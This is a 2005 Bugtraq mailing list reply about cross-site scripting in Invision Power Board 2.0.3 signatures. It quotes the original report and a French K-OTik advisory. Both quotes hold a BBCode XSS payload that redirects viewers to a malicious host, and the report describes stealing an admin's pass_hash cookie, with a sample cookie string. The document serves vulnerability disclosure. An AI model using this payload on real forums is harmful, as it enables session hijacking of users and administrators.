Bugtraq mailing list archives
RE: Invision Power Board v2.0.3 XSS vulnerabilities
From: "alex" <pigrelax () yandex ru>
Date: Thu, 31 Mar 2005 22:06:40 +0400
This bug was published a few month ago (15 jan 2005): http://www.securitylab.ru/51808.html -----Original Message----- From: hoang yen [mailto:vnwebmasters () yahoo com] Sent: Tuesday, March 29, 2005 12:59 PM To: bugtraq () securityfocus com Subject: Invision Power Board v2.0.3 XSS vulnerabilities Invision Power Board v2.0.3 XSS vulnerabilities found more at user signature. when Admin read attacker topics, admin will lost his pass_hash example [session_id=f2600ff71ea895e6b9dedb5fd9480d16;%20member_id=48;%20pass_hash=8e e00894ca583f64a85fd41a47048d14;%20topicsread=a%3A7%3A%7Bi%3A498%3Bi%3A111164 9756%3Bi%3A485%3Bi%3A1111649822%3Bi%3A494%3Bi%3A1111651530%3Bi%3A488%3Bi%3A1 111653254%3Bi%3A481%3Bi%3A1111655869%3Bi%3A490%3Bi%3A1111654241%3Bi%3A250%3B i%3A1111655785%3B%7D;%20modtids=%2C;%20anonlogin=-1] I post this topic because v2.0.3 also get bugs not only 1.3.1 and all atacker can hack by this code exploit [COLOR=[IMG]http://server/=`image.jpg[/IMG]]`style=background:url("javascrip t:document.location.replace('http://www.servermalicieux.com');") Viethacker.org Hoangyenxinhdep - dora ----------------------------------------- Date de Publication : 2005-02-21 L K-OTik.COM - Voir Notice LИgale Titre: Invision Power Board SML Codes Cross Site Scripting Vulnerability K-OTik ID : AVIS-2005-0191 Risque : Bas Exploitable Ю distance : Oui Exploitable en local : Oui * Description Technique * Une vulnИrabilitИ a ИtИ identifiИe dans Invision Power Board, elle pourrait Йtre exploitИe par un attaquant afin de rИaliser des attaques par Cross Site Scripting. Le problХme rИsulte d'une erreur prИsente au niveau de la gestion des signatures qui ne sont pas correctement filtrИes, ce qui pourrait Йtre exploitИ afin d'injection du code HTML cotИ client via une signature spИcifique. [COLOR=[IMG]http://server/=`image.jpg[/IMG]]`style=background:url("javascrip t:document.location.replace('http://www.servermalicieux.com');") * Versions VulnИrables * Invision Power Board version 1.3.1 et infИrieures * Solution * Aucune solution officielle pour l'instant * RИfИrences * http://www.k-otik.com/bugtraq/bulletins/937 * CrИdit * VulnИrabilitИs dИcouvertes par Daniel A. * ChangeLog * 2005-02-21 : Version Initiale
![http://server/=`image.jpg[/IMG]]`style=background:url](http://server/=`image.jpg[/IMG]]`style=background:url){kind=link}
Current thread:
- Invision Power Board v2.0.3 XSS vulnerabilities hoang yen (Mar 29)
- RE: Invision Power Board v2.0.3 XSS vulnerabilities alex (Mar 31)